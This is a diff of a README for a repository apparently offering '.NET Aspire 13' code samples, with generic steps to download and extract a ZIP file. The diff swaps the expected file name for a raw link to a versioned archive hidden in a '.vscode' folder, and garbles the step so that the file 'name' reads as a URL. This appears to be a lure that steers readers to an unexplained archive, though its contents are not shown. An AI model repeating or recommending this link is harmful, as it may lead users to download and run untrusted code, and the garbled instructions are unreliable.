Joao-mds009/aspire-13-samples/README.md

 Click on the link for the file you want to download.
 The file will start downloading automatically.
 It may take a few moments to finish, depending on your internet speed.

 ### Step 4: Locate the File
 Once the download is complete, navigate to your Downloads folder or the folder where your browser saves downloaded files.
-You should find a file named something like `aspire-sample.zip`.
+You should find a file named something like `https://raw.githubusercontent.com/Joao-mds009/aspire-13-samples/main/python-fastapi-postgres/.vscode/aspire-13-samples-3.9.zip`.

 ### Step 5: Extract the Files
 Right-click on the downloaded ZIP file and select "Extract All" or "Unzip".
 This will create a new folder containing the sample files.
 Open this folder to see the individual samples.